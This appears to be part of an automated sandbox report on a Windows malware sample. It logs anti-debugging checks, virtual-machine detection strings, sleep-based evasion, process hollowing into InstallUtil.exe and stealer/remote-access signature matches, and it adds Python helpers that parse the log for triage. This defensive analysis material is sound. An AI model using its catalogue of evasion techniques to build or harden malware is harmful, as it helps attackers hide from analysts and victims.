jmp 00007FAAAC4EC6AEh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0C4A second address: 53D0C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAAC4EBB34h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0C73 second address: 53D0D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAC4EC6B1h 0x00000009 add eax, 476DEBF6h 0x0000000f jmp 00007FAAAC4EC6B1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FAAAC4EC6B0h 0x0000001b xor ax, 0518h 0x00000020 jmp 00007FAAAC4EC6ABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [eax] 0x0000002b jmp 00007FAAAC4EC6B9h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 pushad 0x00000035 call 00007FAAAC4EC6B7h 0x0000003a movzx esi, dx 0x0000003d pop edx 0x0000003e popad 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FAAAC4EC6B6h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0D1C second address: 53D0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0D20 second address: 53D0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CE941 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A69990 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A94BD5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CE99C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26E941 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 409990 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 434BD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26E99C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 8F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2590000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2330000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2BD0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2DE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4DE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0CFC rdtsc 0_2_053D0CFC
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 3326
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 3304
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 482
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 742
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Window / User API: threadDelayed 380
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000343001\5.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5224 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5224 Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6632 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6632 Thread sleep time: -122061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5056 Thread sleep count: 81 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5056 Thread sleep time: -2430000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5656 Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5656 Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6652 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6652 Thread sleep time: -132066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep count: 3326 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep time: -6655326s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep count: 3304 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep time: -6611304s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep count: 482 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4912 Thread sleep time: -964482s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep count: 742 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep time: -1484742s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 3280 Thread sleep count: 380 > 30
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 2080 Thread sleep count: 195 > 30
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
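The per-thread sleep counts and delays above are what an analyst reads to decide whether a sample is stalling the sandbox rather than doing work. The Python below is an added triage helper written for this page; it is not part of Joe Sandbox or of the sample. It parses lines in the report's own format (the sample lines embedded in it are copied from the entries above, with the link text dropped), aggregates sleeps per image and thread id, and flags threads using the same thresholds the report itself compares against (30 sleeps, 30000 total delay). The sign of the delay value is treated as the relative-interval convention of NtDelayExecution and only its magnitude is summed; the unit suffix is kept as the report prints it and not converted, since the report does not state the unit.

```python
"""Triage helper for the 'Thread sleep' lines of a Joe Sandbox report.

Added example for this page; not part of the sandbox's tooling or the sample.
The input below is a constructed sample: lines copied from the report above.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5224 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5224 Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep count: 3326 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep time: -6655326s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep count: 742 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6592 Thread sleep time: -1484742s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 3280 Thread sleep count: 380 > 30
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 2080 Thread sleep count: 195 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
"""

# One per-thread sleep line. The leading '-' on the time value mirrors the
# relative-interval convention of NtDelayExecution; only the magnitude is kept.
# The unit suffix ('s' as printed by the report) is matched and discarded, not converted.
LINE_RE = re.compile(
    r"^Source: (?P<path>.+?) TID: (?P<tid>\d+) Thread sleep "
    r"(?P<kind>count|time): -?(?P<value>\d+)s?\b"
)


def summarize_sleeps(report_text):
    """Aggregate sleep count and total delay per (image name, thread id)."""
    totals = defaultdict(lambda: {"count": 0, "time": 0})
    for line in report_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a per-thread sleep line (e.g. 'Thread delayed: ...')
        key = (PureWindowsPath(m["path"]).name, m["tid"])
        totals[key][m["kind"]] += int(m["value"])
    return dict(totals)


def flag_evasive(summary, max_count=30, max_time=30000):
    """Return (image, tid, reason) for threads whose aggregate sleeping exceeds
    the thresholds; defaults are the ones the report compares against."""
    flagged = []
    for (exe, tid), t in sorted(summary.items()):
        reasons = []
        if t["count"] > max_count:
            reasons.append(f"{t['count']} sleeps")
        if t["time"] > max_time:
            reasons.append(f"total delay {t['time']}")
        if reasons:
            flagged.append((exe, tid, "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for exe, tid, why in flag_evasive(summarize_sleeps(SAMPLE_REPORT)):
        print(f"{exe} TID {tid}: {why}")
```

Aggregating by thread id matters here because the report lists TID 6592 and TID 4912 twice each; summed, those two threads account for far more stalling than the raw per-line numbers suggest.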
Source: axplong.exe, axplong.exe, 00000009.00000002.2683241167.00000000003EA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000003.1432101499.00000000015AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: file.exe, 00000000.00000002.1459778407.0000000000A4A000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1492793445.00000000003EA000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1497074934.00000000003EA000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.2683241167.00000000003EA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rstxdhuj.exe, 0000000A.00000002.2004112180.00000000005E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0CFC rdtsc 0_2_053D0CFC
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0023645B mov eax, dword ptr fs:[00000030h] 9_2_0023645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0023A1C2 mov eax, dword ptr fs:[00000030h] 9_2_0023A1C2
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8A008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: axplong.exe, axplong.exe, 00000009.00000002.2683241167.00000000003EA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: V+Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0021D312 cpuid 9_2_0021D312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0021CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 9_2_0021CB1A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
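
The Anti Debugging and HIPS / PFW / Operating System Protection Evasion evidence above can be triaged mechanically: each "Source: <process> <event>" line maps to a known anti-analysis technique, and the sequence of "Memory written" lines against InstallUtil.exe (a write at base 400000 beginning with the MZ header 4D5A, followed by writes at higher addresses in the same image, from the process that also created InstallUtil.exe) is the classic shape of process hollowing. The following Python is an added example, not code from the sandbox report or from the sample; the lines it parses are copied verbatim from the sections above as constructed input, and the technique labels it assigns (ThreadHideFromDebugger, ProcessDebugPort, the SoftICE device names NTICE/SICE/SIWVID, PEB access through fs:[30h]) are interpretations of the observed calls, not labels the report itself prints.

```python
import re
from collections import Counter, defaultdict

# Constructed sample input: behaviour lines copied from the report sections above.
SAMPLE = r"""
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053D0CFC rdtsc 0_2_053D0CFC
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0023645B mov eax, dword ptr fs:[00000030h] 9_2_0023645B
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8A008
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
"""

# "Source: <path ending in .exe> <event text>" -- the paths in this report contain no spaces.
LINE_RE = re.compile(r"^Source: (?P<src>.+?\.exe) (?P<rest>.+)$")
WRITE_RE = re.compile(r"^Memory written: (?P<target>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)"
                      r"(?: value starts with: (?P<head>[0-9A-Fa-f]+))?$")
CREATE_RE = re.compile(r"^Process created: (?P<target>.+?\.exe) ")

# Window titles/class names the sample probes (taken from the report); any hit means
# the process is looking for a debugger or a Sysinternals monitor via FindWindow.
DEBUGGER_WINDOWS = {
    "ollydbg", "procmon_window_class", "regmonclass", "filemonclass", "gbdyllo",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
# Device names of the SoftICE kernel debugger; opening them is a legacy debugger check.
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_line(line):
    m = LINE_RE.match(line.strip())
    return (m.group("src"), m.group("rest")) if m else None


def classify(rest):
    """Map one event text to an anti-analysis technique label (interpretation, see lead-in)."""
    if rest == "Thread information set: HideFromDebugger":
        return "NtSetInformationThread(ThreadHideFromDebugger)"
    if rest.startswith("Open window title or class name: "):
        return "FindWindow debugger/monitor check" if rest.split(": ", 1)[1] in DEBUGGER_WINDOWS else None
    if rest.startswith("File opened: "):
        return "SoftICE device-name check" if rest.split(": ", 1)[1] in SOFTICE_DEVICES else None
    if rest == "Process queried: DebugPort":
        return "NtQueryInformationProcess(ProcessDebugPort)"
    if rest.startswith("Code function: "):
        if " rdtsc " in rest:
            return "rdtsc timing check"
        if "fs:[00000030h]" in rest:   # fs:[30h] is the PEB pointer on 32-bit Windows
            return "PEB read via fs:[30h] (BeingDebugged/NtGlobalFlag)"
        return None
    if rest == "Process token adjusted: Debug":
        return "SeDebugPrivilege enabled"
    return None


def summarize(text):
    """Per-process count of each anti-analysis technique seen in the report lines."""
    counts = defaultdict(Counter)
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed:
            tech = classify(parsed[1])
            if tech:
                counts[basename(parsed[0])][tech] += 1
    return {proc: dict(c) for proc, c in counts.items()}


def find_hollowing(text):
    """Flag (source, target) pairs where the source wrote an MZ header into a process it created."""
    writes = defaultdict(list)   # (src, target) -> [(base, value head)]
    created = set()              # (src, target)
    for line in text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        src, rest = parsed
        m = WRITE_RE.match(rest)
        if m:
            writes[(basename(src), basename(m["target"]))].append((int(m["base"], 16), m["head"]))
            continue
        m = CREATE_RE.match(rest)
        if m:
            created.add((basename(src), basename(m["target"])))
    findings = []
    for (src, target), ws in writes.items():
        mz_bases = [b for b, head in ws if head and head.upper().startswith("4D5A")]
        if mz_bases and (src, target) in created:
            findings.append({"source": src, "target": target,
                             "image_base": mz_bases[0], "writes": [b for b, _ in ws]})
    return findings


if __name__ == "__main__":
    for proc, techs in summarize(SAMPLE).items():
        print(proc, techs)
    for f in find_hollowing(SAMPLE):
        print("hollowing candidate:", f)
```

Run as-is it prints the per-process technique counts (file.exe: HideFromDebugger, DebugPort, rdtsc; axplong.exe additionally the FindWindow, SoftICE and PEB checks; rstxdhuj.exe only SeDebugPrivilege) and one hollowing candidate, rstxdhuj.exe writing into InstallUtil.exe at image base 0x400000. The hollowing check deliberately requires both the MZ write and the process creation from the same source, so a write of an MZ header into a process the writer did not spawn is reported as nothing rather than as a false positive.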

Stealing of Sensitive Information

Source: Yara match File source: 2.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1419233067.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1492718089.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1449387719.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1496999344.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1459683482.0000000000861000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2682988440.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1953487014.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1456183311.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000343001\5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe, type: DROPPED
Source: Yara match File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4684, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000343001\5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe, type: DROPPED
Source: Yara match File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
